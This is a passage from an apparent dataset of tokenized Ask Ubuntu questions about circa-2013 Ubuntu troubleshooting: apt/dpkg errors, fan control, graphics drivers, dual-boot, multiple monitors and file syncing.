libsdl-ttf2.0-0 libsdl-ttf2.0-0 : i386 libsdl1.2debian libsdl1.2debian : i386 libsigc++-2.0-0c2a : i386 libsmpeg0 libsndfile1 libsndfile1 : i386 libssh2-1 : i386 libsvga1 : i386 libsysfs2 : i386 libts-0.0-0 libts-0.0-0 : i386 libv4l-0 libv4lconvert0 libva1 : i386 libvpx1 : i386 libwebp2 libwebp2 : i386 libx264-123 : i386 libx86-1 : i386 libxcb-render-util0 : i386 libxmuu1 : i386 libxvidcore4 : i386 openssh-blacklist openssh-blacklist-extra python-notify sane-utils the following packages will be upgraded : gtk2-engines-pixbuf : i386 ia32-libs libapache2-mod-php5 libappindicator1 libcairo2 libcairo2 : i386 libexif12 : i386 libgail-common : i386 libgail18 : i386 libgd2-xpm libgd2-xpm : i386 libgnutls26 libgnutls26 : i386 libgphoto2-2 : i386 libgphoto2-port0 : i386 libgtk-3-0 libgtk-3-bin libgtk-3-common libgtk2.0-0 libgtk2.0-0 : i386 libjpeg62 liblapack3gf liblzma5 libmp3lame0 libnspr4 libnspr4 : i386 libnss3 libnss3 : i386 libnss3-1d libpam0g libpango1.0-0 libpango1.0-0 : i386 libpopt0 libqt4-dbus libqt4-dbus : i386 libqt4-declarative : i386 libqt4-designer : i386 libqt4-network : i386 libqt4-opengl : i386 libqt4-qt3support : i386 libqt4-script : i386 libqt4-scripttools : i386 libqt4-sql : i386 libqt4-sql-mysql : i386 libqt4-svg : i386 libqt4-test : i386 libqt4-xml libqt4-xml : i386 libqt4-xmlpatterns : i386 libqtcore4 libqtcore4 : i386 libqtgui4 : i386 librsvg2-common librsvg2-common : i386 libsane : i386 libsane-common libsigc++-2.0-0c2a libtiff4 libtiff4 : i386 libv4l-0 : i386 libv4lconvert0 : i386 libxft2 libxft2 : i386 libxml2 libxml2 : i386 libxml2-dev libxmuu1 openssh-client openssh-server php5-cgi php5-cli php5-common php5-curl php5-gd php5-imap php5-mcrypt php5-mysql php5-sqlite php5-xsl plymouth python-appindicator python-glade2 python-gtk2 qdbus 84 upgraded , 103 newly installed , 3 to remove and 733 not upgraded . 4 not fully installed or removed . need to get 0 b/86.9 mb of archives . after this operation , 97.9 mb of additional disk space will be used . do you want to continue [ y/n ] ? y extracting templates from packages : 100 % preconfiguring packages ... ( reading database ... 123953 files and directories currently installed . ) unpacking freeglut3 : i386 ( from ... /freeglut3_2.6.0-4_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/freeglut3_2.6.0-4_i386.deb ( -- unpack ) : unable to create `/usr/lib/i386-linux-gnu/libglut.so.3.9.0.dpkg-new ' ( while processing `./usr/lib/i386-linux-gnu/libglut.so.3.9.0 ' ) : permission denied no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) unpacking lesstif2 : i386 ( from ... /lesstif2_1 % 3a0.95.2-1.1_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/lesstif2_1 % 3a0.95.2-1.1_i386.deb ( -- unpack ) : unable to create `/usr/lib/i386-linux-gnu/libxm.so.2.0.1.dpkg-new ' ( while processing `./usr/lib/i386-linux-gnu/libxm.so.2.0.1 ' ) : permission denied no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) unpacking libasyncns0 : i386 ( from ... /libasyncns0_0.8-4_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libasyncns0_0.8-4_i386.deb ( -- unpack ) : unable to create `/usr/lib/i386-linux-gnu/libasyncns.so.0.3.1.dpkg-new ' ( while processing `./usr/lib/i386-linux-gnu/libasyncns.so.0.3.1 ' ) : permission denied no apport report written because maxreports is reached already unpacking libts-0.0-0 : i386 ( from ... /libts-0.0-0_1.0-11_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libts-0.0-0_1.0-11_i386.deb ( -- unpack ) : error creating directory `./usr/lib/i386-linux-gnu/ts0 ' : permission denied no apport report written because maxreports is reached already unpacking libdirectfb-1.2-9 : i386 ( from ... /libdirectfb-1.2-9_1.2.10.0-5_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libdirectfb-1.2-9_1.2.10.0-5_i386.deb ( -- unpack ) : error creating directory `./usr/lib/i386-linux-gnu/directfb-1.2-9 ' : permission denied no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) unpacking libedit2 : i386 ( from ... /libedit2_2.11-20080614-5_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libedit2_2.11-20080614-5_i386.deb ( -- unpack ) : unable to create `/usr/lib/i386-linux-gnu/libedit.so.2.11.dpkg-new ' ( while processing `./usr/lib/i386-linux-gnu/libedit.so.2.11 ' ) : permission denied no apport report written because maxreports is reached already preparing to replace libexif12 : i386 0.6.20-2ubuntu0.1 ( using ... /libexif12_0.6.20-3_i386.deb ) ... unpacking replacement libexif12 : i386 ... dpkg : error processing /var/cache/apt/archives/libexif12_0.6.20-3_i386.deb ( -- unpack ) : unable to create `/usr/lib/i386-linux-gnu/libexif.so.12.3.2.dpkg-new ' ( while processing `./usr/lib/i386-linux-gnu/libexif.so.12.3.2 ' ) : permission denied no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) unpacking libflac8 : i386 ( from ... /libflac8_1.2.1-6_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libflac8_1.2.1-6_i386.deb ( -- unpack ) : unable to create `/usr/lib/i386-linux-gnu/libflac.so.8.2.0.dpkg-new ' ( while processing `./usr/lib/i386-linux-gnu/libflac.so.8.2.0 ' ) : permission denied dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) no apport report written because maxreports is reached already unpacking libfontconfig1 : i386 ( from ... /libfontconfig1_2.9.0-7.1_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libfontconfig1_2.9.0-7.1_i386.deb ( -- unpack ) : unable to create `/usr/lib/i386-linux-gnu/libfontconfig.so.1.5.0.dpkg-new ' ( while processing `./usr/lib/i386-linux-gnu/libfontconfig.so.1.5.0 ' ) : permission denied no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) unpacking libfontconfig1 ( from ... /libfontconfig1_2.9.0-7.1_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/libfontconfig1_2.9.0-7.1_amd64.deb ( -- unpack ) : unable to create `/usr/lib/x86_64-linux-gnu/libfontconfig.so.1.5.0.dpkg-new ' ( while processing `./usr/lib/x86_64-linux-gnu/libfontconfig.so.1.5.0 ' ) : permission denied no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) preparing to replace libxft2 : i386 2.2.0-3ubuntu2 ( using ... /libxft2_2.3.1-1_i386.deb ) ... de-configuring libxft2 ... unpacking replacement libxft2 : i386 ... dpkg : error processing /var/cache/apt/archives/libxft2_2.3.1-1_i386.deb ( -- unpack ) : unable to create `/usr/lib/i386-linux-gnu/libxft.so.2.3.1.dpkg-new ' ( while processing `./usr/lib/i386-linux-gnu/libxft.so.2.3.1 ' ) : permission denied no apport report written because maxreports is reached already preparing to replace libxft2 2.2.0-3ubuntu2 ( using ... /libxft2_2.3.1-1_amd64.deb ) ... de-configuring libxft2 : i386 ... unpacking replacement libxft2 ... dpkg : error processing /var/cache/apt/archives/libxft2_2.3.1-1_amd64.deb ( -- unpack ) : unable to create `/usr/lib/x86_64-linux-gnu/libxft.so.2.3.1.dpkg-new ' ( while processing `./usr/lib/x86_64-linux-gnu/libxft.so.2.3.1 ' ) : permission denied no apport report written because maxreports is reached already errors were encountered while processing : /var/cache/apt/archives/freeglut3_2.6.0-4_i386.deb /var/cache/apt/archives/lesstif2_1 % 3a0.95.2-1.1_i386.deb /var/cache/apt/archives/libasyncns0_0.8-4_i386.deb /var/cache/apt/archives/libts-0.0-0_1.0-11_i386.deb /var/cache/apt/archives/libdirectfb-1.2-9_1.2.10.0-5_i386.deb /var/cache/apt/archives/libedit2_2.11-20080614-5_i386.deb /var/cache/apt/archives/libexif12_0.6.20-3_i386.deb /var/cache/apt/archives/libflac8_1.2.1-6_i386.deb /var/cache/apt/archives/libfontconfig1_2.9.0-7.1_i386.deb /var/cache/apt/archives/libfontconfig1_2.9.0-7.1_amd64.deb /var/cache/apt/archives/libxft2_2.3.1-1_i386.deb /var/cache/apt/archives/libxft2_2.3.1-1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i have already tried out these solutions : askubuntu.com/questions/106854/apt-get-install-error can not install anything through terminal - apt-get -f install apt-get upgrade fails due to dependency issues i use linux version 3.2.0-35-generic ( buildd @ allspice ) ( gcc version 4.6.3 ( ubuntu/linaro 4.6.3-1ubuntu5 ) ) # 55-ubuntu smp wed dec 5 17:42:16 utc 2012 # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/md2 during installation uuid=9454a058-f582-418b-bbb0-c52a14b2636f / ext4 errors=remount-ro , usrquota 0 1 # /boot was on /dev/md0 during installation uuid=f3f8ddcc-9906-4896-b9de-beb21689f37e /boot ext2 defaults 0 2 # swap was on /dev/md1 during installation uuid=d5f380b3-eca3-40ad-9b14-b29d7d603dd8 none swap sw 0 0 i was trying to install deluge when this happened and my server edition distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04.1 lts '' here is mount india262 : ~ # mount /dev/md2 on / type ext4 ( rw , errors=remount-ro , usrquota ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) /dev/md0 on /boot type ext2 ( rw )
251632	ubuntu one : how to delete photos from cloud ?	i have configured my android to auto-upload photos to the u1 cloud . which is usefull in case i lose the phone . however from time to time i want to clean out the junk photos . if i go to https : //one.ubuntu.com/photos there does n't seem to be any way to delete photos . if i go to the https : //one.ubuntu.com/files area and then the folder that the photos are in , i encounter the following problem : too many files or folders in this folder to display , only displaying 1000 entries . so i ca n't figure out how to delete photos . also if a file is deleted from the cloud will it be deleted from the sync 'd devices ?
251633	flash on firefox	since adobe recently dropped support for firefox on linux , i ca n't get flash player to work properly on adobe connect in ubuntu . youtube videos work fine , i only have problems with adobe connect . i am using ubuntu 12.10 and firefox 18.0.1 and flash 11.2.202.261 . is there a ppa or another lead i could use to get the latest ( or more current ) version of flash player for ubuntu ?
251634	what is the path of libraries ( samples , docs ) setted up from software center of ubuntu 12.04 ?	i installed opencv and its doc and samples from software center but i can not find the them at anywhere . what is the certain location for all these at ubuntu12.04
251635	how to install jenkins charm with dependecies ?	i have a question about the jenkins charm : after creating a new instance with a jenkins charm , how can i run a script with commands to install some programs needed in machine created ?
251638	have a secondary charm in juju ?	i want to install some dependencies on a machine after it created . have a type of secondary charm , who i could install these dependencies , even if these dependencies do not have a charm in charm store ?
251643	sound wo n't play in kubuntu 12.04	i ca n't get sound to work in my computer that i just installed kubuntu 12.04 on . i 've tried to switch between the two audio options in the sound settings , but it still does n't work . any ideas ? thanks !
251655	ca n't use galaxy s3 as a usb storage device	hi im trying to move some files from my phone to my netbook via usb its running ubuntu 12.10 ( gnome shell ) . when i plug my s3 it seems to recognise what it is but ca n't read any of its contents . i just want to use it as if it were a storage device and move some files to my netbook can anyone help with this issue please .
251661	how should i handle multiple monitors when i regularly connect and disconnect different monitors and projectors	i 'm moving from a macbook pro ( with macosx ) to a lenovo t430 running ubuntu 12.10 . i use the laptop for work , and work from home regularly . i have an external 30 '' monitor at home , an external 23 '' monitor at work , and often need to connect my laptop to projectors . i 've found so far with ubuntu that connecting an external monitor or projector seems to do the right thing ( i.e . extends the desktop to display on the monitor/projector ) , but when i disconnect the monitor , it leaves the 'workspace ' the same size as it was when the external monitor was connected - so i ca n't see any windows that were on the external monitor . if i go into `` workspace switcher '' , i can see the windows and drag them onto the laptop monitor to work with them . if i go to 'system settings - > display ' and detect displays , it seems like the workspace size gets fixed , but instead of having all of my windows on my workspace on my laptop display , they get spread over other workspaces , so i still have to go into `` workspace switcher '' and drag windows around . i 'm really hoping there 's a way to get similar behaviour to macosx , which automatically resizes the workspace when the monitor is removed and moves all windows onto your screen so they are visible . any advice or ways to make this less painful ? update on feb 11 , 2013 : i 've been retesting this , and it seems like the workspace size is now being updated automatically when i disconnect/reconnect the monitor cable . i do n't believe i 've changed anything , so not sure why i 'm seeing different behaviour here . the second part of the problem - moving all windows onto the main workspace - still exists
251662	should i install 12.10 or 12.04.1 ?	i am extremely new to ubuntu and was shown by a friend . i am tired of paying for programs , that i have to fight with to get the results i want . i am also sick of paying for them . i really like the ubuntu mind set . i am going to school for computer programming , but do not know a whole lot as of yet . i 'm just looking for pointers , software to download to help teach me programming , and lastly which ubuntu to go with as a beginner ? thank you ahead of time for your help .
251663	how do i use apple magic trackpad for firefox navigation ?	i use my trackpad with touchegg and touchegg-gce for easier configuration . in the initial configuration there 's an 'application ' section for chromium navigation which uses 2-finger drag that does n't seem to work in chromium or in firefox ( when i add firefox ) . the problem seems to be that the 2-finger drag is used for scrolling left and right . i have the feeling that an override for this function in chromium or firefox does n't work and scrolling is `` more important '' than forward or back navigation . with an imac i saw that this is possible so did anyone get the trackpad to be usable for browser navigation ?
251677	internet does not work on windows 8 pre-installed laptop	i 'm booting into ubuntu using a liveusb on my windows 8 sony vaio laptop . it connects to the wi-fi but nothing works . i checked the proxy settings on the browser . even when i try to ping google.com from the terminal , nothing happens . it seems like there 's no dns resolution happening . is this something to do with the windows uefi secure boot ? i 've installed ubuntu on a number of windows vista and 7 laptops before and have never had this problem . any help on this is appreciated . relevant lspci -nnk entry : 01:00.0 network controller [ 0280 ] : atheros communications inc. ar9485 wireless network adapter [ 168c:0032 ] ( rev 01 ) subsystem : foxconn international , inc. device [ 105b : e044 ] kernel driver in use : ath9k kernel modules : ath9k using ping : ubuntu @ ubuntu : ~ $ ping google.com ping : unknown host google.com ubuntu @ ubuntu : ~ $ ping localhost ping localhost ( 127.0.0.1 ) 56 ( 84 ) bytes of data . 64 bytes from localhost ( 127.0.0.1 ) : icmp_req=1 ttl=64 time=0.036 ms
251679	use default music player in dash	when i select music file with files & folders lense , it loads it with default music player . but when i use music lense , it loads file with rhythmbox . how can i change this behavior ?
251682	where do i get linux-headers-3.0.0 for 12.04	i 'm pretty new to ubuntu , so question may seem stupid . i have a module which used to work on my parents laptop . after several updates module no longer works , and i 'm pretty sure , old kernel would solve the issue . however , i ca n't rebuild module with dkms for an old 3.0.0-16 kernel , because there are no kernel sources . linux-headers-3.0.0 is not in the repository . however linux-image-3.0.0-generic still exists in the repo . so where do i get headers for an old kernel ? thanks
251684	no fan control for cpu fan	i am using a dell inspiron 15 laptop , with ubuntu installed on my wd passport partition as a portable installation . on the cpu fan , it never looks like it has any control over itself . at a constant speed and noise , it keeps on running no matter whether i use the system or not . help is much appreciated .
251687	bash and c - 2 processes in concurrency to write a file	i made a c program , it forks 2 processes and each one of them uses system ( ) to call 2 scripts ( script1.sh and script2.sh ) , what i want to do is let them write in a file ( output.txt ) in parallel but in different moments . for now my script1.sh ( from process p1 ) write in the file for first , and then script2.sh ( from process p2 ) write in the same file , but i need them to write in this way : time 1 : p1 writes 2 words in `` output.txt '' time 2 : p2 wirtes 3 words in `` output.txt '' time 3 : p1 writes 1 word in `` output.txt '' time 4 : p2 writes 6 words in `` output.txt '' etc ... i know that system ( ) function is synchronous , but i succeeded in making it asynchronous using system ( `` script1.sh & '' ) the problem is that i do n't know how to do that , because if p1 calls script1.sh with `` & '' it executes during p2 without pauses , so that 's not what i want . i also know how to stop p1 using pkill -f `` script1.sh so maybe it helps i do n't know . how can i reach that aim ? thanks
251690	12.10 ubuntu will not boot due to no space left on device	i have a windows 7 / ubuntu 12.10 system that has been booting and running without problems for several months . normally i run programs that generate a large amount of data and save it to a partition created by windows 7 . this way the data is accessible in windows and in ubuntu , but yesterday i accidentally ran a program from the partition in which ubuntu is installed and i think it has filled up all of that partition . i now can not boot ubuntu . when i boot in recovery mode and then from there to normal mode i get the messages : starting save kernal messages [ fail ] grub-editenv : error : can not write to '/boot/grub/grubenv/new ' : no space left on device i can boot using a live-usb so dont think there are any hardware problems . the computer is not connected to a network so packages have n't been updated in a while . does anyone have any ideas on how i can delete some disk space from the same partition as my ubuntu installation ? i 've tried through windows but ca n't see the ubuntu partition and i 've tried from the live-usb boot where the hdd is visible as 1.0 tb volume however when i right click on it and select mount there is the error : adding read acl for uid 999 to '/media/ubuntu ' failed : operation not supported . i am able to start the hdd installation in recovery mode and drop to root shell prompt . there are some directories i can delete in my home folder from here but i get an error saying they are read only directories , even when using sudo rm -rf < directory > . is it possible to delete directories this way ?
251693	copy a files with defined transfer rate	i am using linux via an external drive & as such it 's not able to provide that transfer speed efficiency as is provided by internal sata plus not every pc has usb3 ... thus when i transfer say a ~5gb film from or to this external drive i notice that os stucks or gnome breaks.. i thought that it be better that i use a defined transfer while copying large files ... the idea is to cap transfer rate at max of 10mb/sec instead of present +20mb/sec . so how do i do it cp < source > < desitnation > - < flag > < mydefinedrate >
251701	can i install windows when a full encrypted ubuntu disk is installed ?	i am running a full-disk encrypted ubuntu 12.10 . can i install windows alongside , adding it at the boot menu on this machine ? if so , how ?
251704	how does one open a .rta file ?	i got some .rta file from a cellphone . how do i open it ? must it be converted to a txt or other file type first ? i am lost . what is this file type ? wiki says it 's an ibm voice to text .
251705	dell 7520 ( inspiron 15r se ) , fan on full speed on 12.04 , 12.10 , 13.04	the fan on my dell inspiron 7520 ( inspiron 15r se ) is constantly running at full speed with a lot of noise . technical details : graphics : 2gb amd radeon hd 7730m , switchable/hybrid with intel 4000 graphics intel core i5-3210m 2.50 6gb ram 1080hd display 750gb harddrive dual boot win7 64 and ubuntu 12.10 64 bios version a09 ( 1. jan 2013 =newest ) i tried out a lot of suggestions from searching thousands of forums , they all didn´t help out , fan keeps spinning . here´s a list of the things i did , maybe i can help someone to avoid the work or somebody has a solution i have n't tried yet : the useless options trying different os : in windows 8 and 7 everything works fine . ubuntu 12.04 , 12.10 , 13.04 in each case 32bit and 64bit i have noisy fan bios options/update : i updated bios from a07 to a09 , no change in fanspeed intel speedstep , intel smart response , ahci , ata mode , no changes in fanspeed using different partition tables , boot modes : i used uefi boot on a gpt partition , on mbr and legacy boot , no changes in fanspeed switcheroo : the only thing of little help is the switcheroo options from this link https : //help.ubuntu.com/community/hybridgraphics switching off the amd card actually only saves power but does n't reduce the fan speed echo off > /sys/kernel/debug/vgaswitcheroo/switch power option : this link dell inspiron7520 and ubuntu 12.04 issues was so far the most helpful comment , it reduces fan speed imediately , but with little cpu usage rises up to full speed again ... so not a satisfying solution . echo `` min_power '' | sudo tee /sys/class/scsi_host/host*/link_power_management_policy taking out the ac plug reduces fan speed in most cases as well , but runs at full speed from time to time . graphics drivers : the catalyst drivers didn´t work at all . i tried different once from 12.something up to 13.2 beta after installation unity or compiz didn´t work and i had a blank desktop screen , besides fan speed wouldn´t change . kernels : i tried several kernels up to the new quantal 3.7 , nothing changed i8kutils/lm sensors , pwmconfig : to control the fan manually lm sensors with pwmcontrol didn´t work ( no compatible sensors detect ... something like this ) i8kutils from this thread http : //forum.ubuntuusers.de/topic/dell-inspiron-15-se-7520-luefter-dreht-auf-vol/ # post-4743072 controled the fans and kept the noise lower but the temparature rises and fan starts spinning a few seconds and stops , starts again and stops and so on , that is even more disturbing than running at full speed ... so , no option for me . jupiter : jupiter saves battery power but doesn´t reduce fanspeed . and here comes the most questionable thing . my flatmate has the exact same model.the difference is she has bios version a02 ( or a04 not sure now ) , with a 1tb harddrive and no 1080 hd display and ubuntu 12.04 dual boot win 7 each 32bit works just fine out of the box . i tried to downgrade bios to a04 but doesn´t work , an error occurs . i find myself working on this far too long , i am behind this since months . i even try to make myself comfortable in windows , although i never want to go back to thas os . greetings zanza i ran lm-sensors and i dont really know how to interpretate the output message . on the other laptop mentioned above , same model with little differences it shows next to temp1 also temp2 my lm-sensors shows this : coretemp-isa-0000 adapter : isa adapter physical id 0 : +43.0°c ( high = +87.0°c , crit = +105.0°c ) core 0 : +43.0°c ( high = +87.0°c , crit = +105.0°c ) core 1 : +41.0°c ( high = +87.0°c , crit = +105.0°c ) radeon-pci-0100 adapter : pci adapter temp1 : +48.0°c lm-sensors of the other laptop ( same model , with differences like mentioned above ) shows this : acpitz-virtual-0 adapter : virtual device temp1 : +27.8°c ( crit = +106.0°c ) temp2 : +29.8°c ( crit = +106.0°c ) coretemp-isa-0000 adapter : isa adapter physical id 0 : +50.0°c ( high = +87.0°c , crit = +105.0°c ) core 0 : +50.0°c ( high = +87.0°c , crit = +105.0°c ) core 1 : +51.0°c ( high = +87.0°c , crit = +105.0°c ) can anybody explian me what it means ?
251709	how to give access to lamp server so that it can execute a `` .cgi '' or '' .pl '' file which in turn executes a c program which controls a parallel port ?	i have written a c program that controls the parallel port ... and also written a .cgi file which in turn executes the above c program which turns 'on ' an led attached to the parallel port . this thing works fine when i execute the .cgi file by giving permissions to execute . but when i try to do the same thing over the localhost ( lamp server ) the .cgi file is getting called but the c program which it should call is not getting executed . there seems to exist some permissions problem with the web server when trying to access the hardware .
251710	how to change my background ?	i 'm running ubuntu 12.10 ( my system info reads `` ubuntu 13.04 '' , though , for some reason ) . right clicking on the desktop and then changing the background there doesnt work and just sends me to system settings . i installed wallach to change the background , but i 'd prefer a `` proper '' solution . what am i doing wrong , or how can i fix this ?
251712	how can i install a gsettings schema without root privileges ?	the typical workflow to install a gsettings schema is this : create a schema , with the extension .gschema.xml , with contents like this : < ? xml version= '' 1.0 '' encoding= '' utf-8 '' ? > < schemalist > < schema id= '' com.companyname.appname '' path= '' /com/companyname/appname/ '' > < key type= '' b '' name= '' mybool '' > < default > false < /default > < summary > example summary < /summary > < description > example description < /description > < /key > < /schema > < /schemalist > copy the schema to /usr/share/glib-2.0/schemas/ . compile the schema by running this command : sudo glib-compile-schemas /usr/share/glib-2.0/schemas/ however , writing to /usr/share/glib-2.0/schemas/ requires root privileges . is there a way to install a schema to a non-global user directory ?
251718	slow speed of ubuntu 12.04 in virtualbox 4.2.6	i am using windows 7 on dell dual core . i have recently installed ubuntu 12.04 on vb4.2.6 . but the speed is very slow at doing everything . opening terminal etc . any way to improve that ? thanks in advance
251720	ubuntu 12.10 not available in update list	ubuntu 12.10 does not show up in my software updates list . do i have to install all the updates for it to be available. ? or can i install it without the existing updates ?
251721	hosting a website on ubuntuone	recently , google drive offered a way to host websites . is it possible to do something similar using ubuntuone ?
251723	how can i get a slide-in effect for guake under 12.10 ?	evidently , in earlier releases of ubuntu , an animation add-on plugin for compiz called skewer could be tweaked to get a slide-in/slide-out effect for opening and closing windows . alas , i discovered guake while running quantal , and skewer is gone from the compiz plugin packages provided in the official repos . guake 's really nice , but the fade/expand effect just feels wrong -- is there any way to get skewer back , or is there some other plugin that 'll do what i want ?
251744	/can you install ubuntu to hdd but it runs completely from ram while hdd is not spinning ?	my main purpose is to be able to install ubuntu to the hard disc so that my settings and everything are saved but i want it to load itself to my ram for faster operation and better battery life while the hdd sleeps
251752	install ubuntu on dell xps 8500 with preinstalled windows 8	i got a dell xps 8500 pre-installed window 8 . i installed ubuntu 12.10 and after reboot the system directly enter into ubuntu . i use boot-repair and i got the grub menu with ubuntu and windows 8 . if i enter ubuntu , there is no problem . but if i enter windows 8 it is ok for the first time , but if i restart the system , i got a line `` no bootable device available ! ! ! press any key to retry . '' on the top of the screen . in the bios i open the uefi and secure boot . this is the boot info : http : //paste.ubuntu.com/1611189/ . what can i do now ? 2013-02-07 thanks rod smith very much for his great help . i summarize here my problem and the solution : platform : dell xps 8500 , 1t hdd , pre-installed windows 8 ; uefi open , secure boot open problem : install ubuntu 12.10 ( i want to use 10.04 , but because only from 12.10 uefi and secure boot is supported ) , everything is ok except entering windows 8 and restart . the system will not find boot device . the reason here is a 'windows boot manager ' that revise the boot file . solution : in command shell type : `` bcdedit /set { bootmgr } path \efi\ubuntu\shimx64.efi '' to correct the bootfile . the `` shimx64.efi '' file is under `` /boot/efi/efi/ubuntu/ '' . ( as rod said we should choose shimx64.efi since i open secure boot option ; this also can be found after using 'boot-repair ' which says : `` please do not forget to make your bios boot on sda1/efi/ubuntu/shimx64.efi file ! `` ; so if your system is different check there . ) note : as before the solution i have tried with rod 's advice to kill `` fast boot '' and `` hybrid boot '' options . i did n't test if i change back to `` fast boot '' will have problem . anyway , this can be tested since now the system works fine .
251754	why would modinfo say a module is not found when it appears with lsmod	i have noticed several cases where , if i use lsmod to find a module and then use modinfo for that module , it comes out with a error : module not found message . for example with the nvidia module ( when using the proprietary drivers ) . so in what cases would a module appear on lsmod but give an error like the one i mentioned above with modinfo .
251760	optirun glxgears stuck	i intsall bumblebee on ubuntu 12.10 by this articale and try to run some programs but it just stuck on terminal screen and i have to use ^z to stop it . no glxgears and no glxspheres work . here is some information maybe needed : : ~ $ sudo cat /proc/acpi/bbswitch 0000:01:00.0 on : ~ $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf108 [ geforce gt 540m ] ( rev a1 ) also i change driver= to driver=nvidia and kerneldriver=nvidia-current to kerneldriver=nvidia in /etc/bumblebee/bumblebee.conf and try again , it does not work yet . i 'd be very grateful if someone can help me .
251762	fresh ubuntu 12.04 install fatal server error : no screens found	just installed ubuntu 12.04 on my uefi asus laptop . upon my first boot i am presented with a terminal instead of the gui . i get a no screens found error if attempting to use startx . i am using an amd radeon hd 7730m with a radeon hd 7660g switchable graphics configuration . how do i fix no screens error ? i have followed the instructions on this page how to turn off ati radeon hd 7730m ( on dell inspiron 7520 ) ? in order to load the driver for my gpu and have the same result . after completing installation i attempt to verify using the following command : fglrxinfo i get error : unable to open display ( null ) .
251764	unity tray icons	i have been using gnome shell but recently tried working with unity in 12.04 . i have a couple of oddball apps whose tray icons do n't work well regardless of theme ( they must be missing transparency ) . two apps yammer and jungledisk are the problem . if i can find the actual icons i could probably fix them . the icons in /usr/share/pixmaps do n't match what i see in the tray . see the two icons right next to skype .
251766	skype wont load on 12.10	i installed skype onto my laptop and it wont start at all . i installed it from the ubuntu software center . not sure what i did wrong . any ideas ?
251767	how can i boot a live system from a hard disk and then install to the same drive ?	i need to install lubuntu on to a hard drive that has no other means of installation other than the hard drive itself ( usb , cd , net , none of those are available on this system ) . what i have already tried : i installed a livecd onto the hdd and it runs fine , but when i try to install to the same drive , no matter on which partition i choose ( tried root , boot , and swap partition , using free space , etc . ) it errors out . the errors i get are mostly about not being able to unmount the drive to install , or it being in use . this was tried on several hdd 's so it is n't the drive . specifics : this laptop has no ethernet or cd drive , and only has usb1.1 of which i only have an external floppy that works with it . also , this computer does n't have an operating system , and only 256mb of ram , which lubuntu runs fine on ( live anyway ) . i used rmprepusb because netbootin does n't detect my ide laptop drive , and even tried booting the livecd from a dos floppy .
251769	weird grub/driver issues - screen goes orange on login unless manually selecting ubuntu in grub	i 'm having some interesting issues with my graphic card drivers and grub . i just installed 12.10 and everything is up to date . if i 'm using the x.org amd drivers , i just see a distorted orange image when i get to what 's supposed to be the login-screen . if i press ctrl+alt+f2 , everything just goes black . going back to the gui just gives me the same weird orange screen . however , the sound-effect that indicates that ubuntu is ready to go goes of just fine . now what 's really interesting is that if manually select to start any random version of the linux kernel from grub , everything works just fine ! however , changing what version grub automatically starts with does no difference at all . so i tried using the proprietary drivers . however , even though these get my to the login-screen without the weird grub issues , unity crashes as soon as i log-in and all i can see is the desktop wallpaper and the courser . and if i try to start unity from terminal , i get an avalanche of compiz-errors . i 've reinstalled ubuntu twice , but that does n't seem to fix anything . my graphics card is an amd hd6850 , and i 'm using an amd phenom ii processor . thanks in advance ! : )
251773	how to provide second monitors resolution to application ?	i have a dual monitor setup , with the basic twinview settings from my nvidia-card ( 550 ti ) . one monitor is my primary display ( 1600x900 ) and the other is my tv ( 1920*1080 ) . i have arranged xbmc to start up on my tv ( using windowed mode , a quick and dirty gtkhack to hide the borders , and wmctrl to stretch it ) . this works for most games that have window mode as well ( e.g . shank2 ) . however , i am unable to get some others working as i am unable to select the 1920x1080 resolution in their settings menu . all available resolutions for my primary display and the combined resolution are available . ( e.g . vessel , snapshot ) how is it possible to provide my 1920x1080 resolution to the applications/games ? every other workaround/solution is also very much appreciated !
251780	unable to sync ubuntu iso	i 'm trying to sync the ubuntu 13.04 daily iso according to this answer . i 've used this command : zsync http : //cdimage.ubuntu.com/daily-live/current/raring-desktop-amd64.iso.zsync it worked the first time i ran it and i was able to download the entire iso . however , any time i run it again , it fails with this error : $ zsync http : //cdimages.ubuntu.com/daily-live/current/raring-desktop-amd64.iso.zsync # # # # # # # # # # # # # # # # # # # # 100.0 % 13.5 kbps done reading seed file raring-desktop-amd64.iso : ************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************read raring-desktop-amd64.iso . target 89.4 % complete . downloading from http : //cdimages.ubuntu.com/daily-live/current/raring-desktop-amd64.iso : # # # # # # # # # # # # # # # # # # -- 90.1 % 18.0 kbps a downloading from http : 